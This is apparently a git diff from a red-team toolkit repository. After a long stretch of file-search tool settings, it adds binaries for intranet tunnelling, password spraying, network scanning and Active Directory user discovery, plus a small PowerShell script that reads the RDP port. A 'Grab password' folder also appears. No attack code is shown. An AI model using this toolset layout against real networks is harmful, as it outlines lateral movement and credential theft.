+creation_time_column_width=153 +date_accessed_column_visible=0 +date_accessed_column_pos=7 +date_accessed_column_width=153 +attribute_column_visible=0 +attribute_column_pos=8 +attribute_column_width=70 +date_recently_changed_column_visible=0 +date_recently_changed_column_pos=9 +date_recently_changed_column_width=153 +run_count_column_visible=0 +run_count_column_pos=10 +run_count_column_width=96 +date_run_column_visible=0 +date_run_column_pos=11 +date_run_column_width=153 +file_list_filename_column_visible=0 +file_list_filename_column_pos=12 +file_list_filename_column_width=96 +translucent_selection_rectangle_background_color= +translucent_selection_rectangle_border_color= +thumbnail_mouseover_border_color= +preview_background_color= +ntfs_volume_guids="\\\\?\\Volume{2d28957f-5c9e-11ea-88a5-806e6f6e6963}","\\\\?\\Volume{319a4f45-c20d-11ea-8074-806e6f6e6963}" +ntfs_volume_paths="C:","C:" +ntfs_volume_roots="","" +ntfs_volume_includes=1,1 +ntfs_volume_load_recent_changes=0,0 +ntfs_volume_include_onlys="","" +ntfs_volume_monitors=1,1 +refs_volume_guids= +refs_volume_paths= +refs_volume_roots= +refs_volume_includes= +refs_volume_load_recent_changes= +refs_volume_include_onlys= +refs_volume_monitors= +filelists= +filelist_monitor_changes= +folders= +folder_monitor_changes= +folder_buffer_size_list= +folder_rescan_if_full_list= +folder_update_types= +folder_update_days= +folder_update_ats= +folder_update_intervals= +folder_update_interval_types= +exclude_folders= +connect_history_hosts= +connect_history_ports= +connect_history_usernames= +connect_history_link_types= +etp_client_rewrite_patterns= +etp_client_rewrite_substitutions= +file_new_search_window_keys=334 +file_open_file_list_keys=335 +file_close_file_list_keys= +file_close_keys=343,27 +file_export_keys=339 +file_copy_full_name_to_clipboard_keys=9539 +file_copy_path_to_clipboard_keys= +file_set_run_count_keys= +file_create_shortcut_keys= +file_delete_keys=8238 +file_delete_permanently_keys=9262 +file_edit_keys= +file_open_keys=8205 +file_open_selection_and_close_everything_keys= +file_explore_path_keys= +file_open_new_keys= +file_open_path_keys=8461 +file_open_with_keys= +file_open_with_default_verb_keys= +file_play_keys= +file_preview_keys= +file_print_keys= +file_print_to_keys= +file_properties_keys=8717 +file_read_extended_information_keys=8517 +file_rename_keys=8305 +file_run_as_keys= +file_exit_keys=337 +file_copy_name_to_clipboard_keys= +file_open_selection_and_do_not_close_everything_keys= +file_open_most_run_keys= +file_open_last_run_keys= +file_custom_verb_1_keys= +file_custom_verb_2_keys= +file_custom_verb_3_keys= +file_custom_verb_4_keys= +file_custom_verb_5_keys= +file_custom_verb_6_keys= +file_custom_verb_7_keys= +file_custom_verb_8_keys= +file_custom_verb_9_keys= +file_custom_verb_10_keys= +file_custom_verb_11_keys= +file_custom_verb_12_keys= +indexes_folders_rescan_all_now_keys= +indexes_force_rebuild_keys= +edit_cut_keys=8536 +edit_copy_keys=8515,8493 +edit_paste_keys=8534,9261 +edit_select_all_keys=8513 +edit_invert_selection_keys= +edit_copy_to_folder_keys= +edit_move_to_folder_keys= +edit_advanced_advanced_copy_to_folder_keys= +edit_advanced_advanced_move_to_folder_keys= +view_filters_keys= +view_preview_keys=592 +view_status_bar_keys= +view_details_keys=1334 +view_medium_thumbnails_keys=1331 +view_large_thumbnails_keys=1330 +view_extra_large_thumbnails_keys=1329 +view_increase_thumbnail_size_keys=1467 +view_decrease_thumbnail_size_keys=1469 +view_window_size_small_keys=561 +view_window_size_medium_keys=562 +view_window_size_large_keys=563 +view_window_size_auto_fit_keys=564 +view_zoom_zoom_in_keys=443 +view_zoom_zoom_out_keys=445 +view_zoom_reset_keys=304,352 +view_go_to_back_keys=549,166 +view_go_to_forward_keys=551,167 +view_go_to_home_keys=548 +view_go_to_show_all_history_keys=1352,328 +view_sort_by_name_keys=305 +view_sort_by_path_keys=306 +view_sort_by_size_keys=307 +view_sort_by_extension_keys=308 +view_sort_by_type_keys=309 +view_sort_by_date_modified_keys=310 +view_sort_by_date_created_keys=311 +view_sort_by_attributes_keys=312 +view_sort_by_file_list_filename_keys= +view_sort_by_run_count_keys= +view_sort_by_date_run_keys= +view_sort_by_date_recently_changed_keys=313 +view_sort_by_date_accessed_keys= +view_sort_by_ascending_keys= +view_sort_by_descending_keys= +view_refresh_keys=116 +view_fullscreen_keys=122 +view_toggle_ltrrtl_direction_keys= +view_on_top_never_keys= +view_on_top_always_keys= +view_on_top_while_searching_keys= +search_match_case_keys=329 +search_match_whole_word_keys=322 +search_match_path_keys=341 +search_match_diacritics_keys=333 +search_enable_regex_keys=338 +search_advanced_search_keys= +search_add_to_filters_keys= +search_organize_filters_keys=1350 +bookmarks_add_to_bookmarks_keys=324 +bookmarks_organize_bookmarks_keys=1346 +tools_options_keys=336 +tools_console_keys=448 +tools_file_list_editor_keys= +tools_connect_to_etp_server_keys= +tools_disconnect_from_etp_server_keys= +help_everything_help_keys=112 +help_search_syntax_keys= +help_regex_syntax_keys= +help_command_line_options_keys= +help_everything_website_keys= +help_check_for_updates_keys= +help_about_everything_keys=368 +help_donate_keys= +search_edit_focus_search_edit_keys=326,114,580 +search_edit_delete_previous_word_keys=4360 +search_edit_auto_complete_search_keys=4384 +search_edit_show_search_history_keys= +search_edit_show_all_search_history_keys=4646,4648 +result_list_item_up_keys=8230,4134 +result_list_item_down_keys=8232,4136 +result_list_page_up_keys=8225,4129 +result_list_page_down_keys=8226,4130 +result_list_start_of_list_keys=8228 +result_list_end_of_list_keys=8227 +result_list_item_up_extend_keys=9254,5158 +result_list_item_down_extend_keys=9256,5160 +result_list_page_up_extend_keys=9249,5153 +result_list_page_down_extend_keys=9250,5154 +result_list_start_of_list_extend_keys=9252 +result_list_end_of_list_extend_keys=9251 +result_list_focus_up_keys=8486,4390 +result_list_focus_down_keys=8488,4392 +result_list_focus_page_up_keys=8481,4385 +result_list_focus_page_down_keys=8482,4386 +result_list_focus_start_of_list_keys=8484 +result_list_focus_end_of_list_keys=8483 +result_list_focus_up_extend_keys=9510,5414 +result_list_focus_down_extend_keys=9512,5416 +result_list_focus_page_up_extend_keys=9505,5409 +result_list_focus_page_down_extend_keys=9506,5410 +result_list_focus_start_of_list_extend_keys=9508 +result_list_focus_end_of_list_extend_keys=9507 +result_list_focus_result_list_keys= +result_list_focus_highest_run_count_result_keys= +result_list_focus_last_run_result_keys= +result_list_toggle_path_column_keys= +result_list_toggle_size_column_keys= +result_list_toggle_extension_column_keys= +result_list_toggle_type_column_keys= +result_list_toggle_date_modified_column_keys= +result_list_toggle_date_created_column_keys= +result_list_toggle_attributes_column_keys= +result_list_toggle_file_list_filename_column_keys= +result_list_toggle_run_count_column_keys= +result_list_toggle_date_recently_changed_column_keys= +result_list_toggle_date_accessed_column_keys= +result_list_toggle_date_run_column_keys= +result_list_size_all_columns_to_fit_keys=8555 +result_list_size_result_list_to_fit_keys= +result_list_context_menu_keys=9337 +result_list_scroll_left_or_thumbnail_left_keys=8229 +result_list_scroll_right_or_thumbnail_right_keys=8231 +result_list_scroll_page_left_or_thumbnail_focus_left_keys=8485 +result_list_scroll_page_right_or_thumbnail_focus_right_keys=8487 +result_list_left_extend_keys=9253 +result_list_right_extend_keys=9255 +result_list_focus_left_extend_keys=9509 +result_list_focus_right_extend_keys=9511 +result_list_select_focus_keys=8224 +result_list_toggle_focus_selection_keys=8480 +result_list_copy_as_csv_keys= +preview_focus_preview_keys= +result_list_font= +result_list_font_size= +search_edit_font= +search_edit_font_size= +status_bar_font= +status_bar_font_size= +header_font= +header_font_size= +normal_background_color= +normal_foreground_color= +normal_bold= +highlighted_background_color= +highlighted_foreground_color= +highlighted_bold= +current_sort_background_color= +current_sort_foreground_color= +current_sort_bold= +current_sort_highlighted_background_color= +current_sort_highlighted_foreground_color= +current_sort_highlighted_bold= +selected_background_color= +selected_foreground_color= +selected_bold= +selected_highlighted_background_color= +selected_highlighted_foreground_color= +selected_highlighted_bold= +selected_inactive_background_color= +selected_inactive_foreground_color= +selected_inactive_bold= +selected_inactive_highlighted_background_color= +selected_inactive_highlighted_foreground_color= +selected_inactive_highlighted_bold= +drop_target_background_color= +drop_target_foreground_color= +drop_target_bold= +drop_target_highlighted_background_color= +drop_target_highlighted_foreground_color= +drop_target_highlighted_bold= +mouseover_background_color= +mouseover_foreground_color= +mouseover_bold= +mouseover_highlighted_background_color= +mouseover_highlighted_foreground_color= +mouseover_highlighted_bold= +mouseover_current_sort_background_color= +mouseover_current_sort_foreground_color= +mouseover_current_sort_bold= +mouseover_current_sort_highlighted_background_color= +mouseover_current_sort_highlighted_foreground_color= +mouseover_current_sort_highlighted_bold= +alternate_row_background_color= +alternate_row_foreground_color= +alternate_row_bold= +alternate_row_highlighted_background_color= +alternate_row_highlighted_foreground_color= +alternate_row_highlighted_bold= +current_sort_alternate_row_background_color= +current_sort_alternate_row_foreground_color= +current_sort_alternate_row_bold= +current_sort_alternate_row_highlighted_background_color= +current_sort_alternate_row_highlighted_foreground_color= +current_sort_alternate_row_highlighted_bold= +hot_background_color= +hot_foreground_color= +hot_bold= +hot_highlighted_background_color= +hot_highlighted_foreground_color= +hot_highlighted_bold= +selected_hot_background_color= +selected_hot_foreground_color= +selected_hot_bold= +selected_hot_highlighted_background_color= +selected_hot_highlighted_foreground_color= +selected_hot_highlighted_bold= +selected_inactive_hot_background_color= +selected_inactive_hot_foreground_color= +selected_inactive_hot_bold= +selected_inactive_hot_highlighted_background_color= +selected_inactive_hot_highlighted_foreground_color= +selected_inactive_hot_highlighted_bold= +thumbnail_mouseover_background_color= +thumbnail_mouseover_foreground_color= +thumbnail_mouseover_bold= +thumbnail_mouseover_highlighted_background_color= +thumbnail_mouseover_highlighted_foreground_color= +thumbnail_mouseover_highlighted_bold= diff --git a/English/scripts/Intranet agent/frpcx.exe b/English/scripts/Intranet agent/frpcx.exe new file mode 100644 index 0000000..78b468e Binary files /dev/null and b/English/scripts/Intranet agent/frpcx.exe differ diff --git a/English/scripts/Intranet agent/iox.exe b/English/scripts/Intranet agent/iox.exe new file mode 100644 index 0000000..b6834ed Binary files /dev/null and b/English/scripts/Intranet agent/iox.exe differ diff --git a/English/scripts/Intranet agent/nb.exe b/English/scripts/Intranet agent/nb.exe new file mode 100644 index 0000000..f8e9db6 Binary files /dev/null and b/English/scripts/Intranet agent/nb.exe differ diff --git a/English/scripts/Intranet agent/npc.exe b/English/scripts/Intranet agent/npc.exe new file mode 100644 index 0000000..8b07169 Binary files /dev/null and b/English/scripts/Intranet agent/npc.exe differ diff --git a/English/scripts/Intranet scanning/SharpSpray.exe b/English/scripts/Intranet scanning/SharpSpray.exe new file mode 100644 index 0000000..cdee55e Binary files /dev/null and b/English/scripts/Intranet scanning/SharpSpray.exe differ diff --git a/English/scripts/Intranet scanning/SharpWebScan.exe b/English/scripts/Intranet scanning/SharpWebScan.exe new file mode 100644 index 0000000..17f2977 Binary files /dev/null and b/English/scripts/Intranet scanning/SharpWebScan.exe differ diff --git a/English/scripts/Intranet scanning/TailorScan.exe b/English/scripts/Intranet scanning/TailorScan.exe new file mode 100644 index 0000000..c3f66bb Binary files /dev/null and b/English/scripts/Intranet scanning/TailorScan.exe differ diff --git a/English/scripts/Intranet scanning/fscan.exe b/English/scripts/Intranet scanning/fscan.exe new file mode 100644 index 0000000..de733d3 Binary files /dev/null and b/English/scripts/Intranet scanning/fscan.exe differ diff --git a/English/scripts/Locate AD/PVEFindADUser.exe b/English/scripts/Locate AD/PVEFindADUser.exe new file mode 100644 index 0000000..b2c0d4f Binary files /dev/null and b/English/scripts/Locate AD/PVEFindADUser.exe differ diff --git a/English/scripts/Locate AD/PsLoggedon.exe b/English/scripts/Locate AD/PsLoggedon.exe new file mode 100644 index 0000000..04b6dfd Binary files /dev/null and b/English/scripts/Locate AD/PsLoggedon.exe differ diff --git a/English/scripts/Locate AD/netview.exe b/English/scripts/Locate AD/netview.exe new file mode 100644 index 0000000..0d89864 Binary files /dev/null and b/English/scripts/Locate AD/netview.exe differ diff --git a/English/scripts/RDP/RegRdpPort.ps1 b/English/scripts/RDP/RegRdpPort.ps1 new file mode 100644 index 0000000..e1a3063 --- /dev/null +++ b/English/scripts/RDP/RegRdpPort.ps1 @@ -0,0 +1,6 @@ +function RegRdpPort { + $RegPath = "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" + $RDPportValue = (Get-ItemProperty -Path $RegPath -ErrorAction Stop).PortNumber + + write-host "RDP-Tcp PortNumber: "$RDPportValue +} \ No newline at end of file diff --git a/scripts/.DS_Store b/scripts/.DS_Store deleted file mode 100644 index d0d79bf..0000000 Binary files a/scripts/.DS_Store and /dev/null differ diff --git a/scripts/Auxiliary/.DS_Store b/scripts/Auxiliary/.DS_Store deleted file mode 100644 index dbbd762..0000000 Binary files a/scripts/Auxiliary/.DS_Store and /dev/null differ diff --git a/scripts/Grab password/.DS_Store b/scripts/Grab password/.DS_Store deleted file mode 100644 index 5b98baa..0000000 Binary files a/scripts/Grab password/.DS_Store and /dev/null differ diff --git a/scripts/Information collection/.DS_Store b/scripts/Information collection/.DS_Store deleted file mode 100644 index ea244eb..0000000 Binary files a/scripts/Information collection/.DS_Store and /dev/null differ diff --git a/scripts/Intranet agent/.DS_Store b/scripts/Intranet agent/.DS_Store deleted file mode 100644 index a97eea3..0000000 Binary files a/scripts/Intranet agent/.DS_Store and /dev/null differ diff --git a/scripts/Intranet scanning/.DS_Store b/scripts/Intranet scanning/.DS_Store deleted file mode 100644 index 452c880..0000000 Binary files a/scripts/Intranet scanning/.DS_Store and /dev/null differ diff --git a/scripts/Locate AD/.DS_Store b/scripts/Locate AD/.DS_Store deleted file mode 100644 index 0160f34..0000000 Binary files a/scripts/Locate AD/.DS_Store and /dev/null differ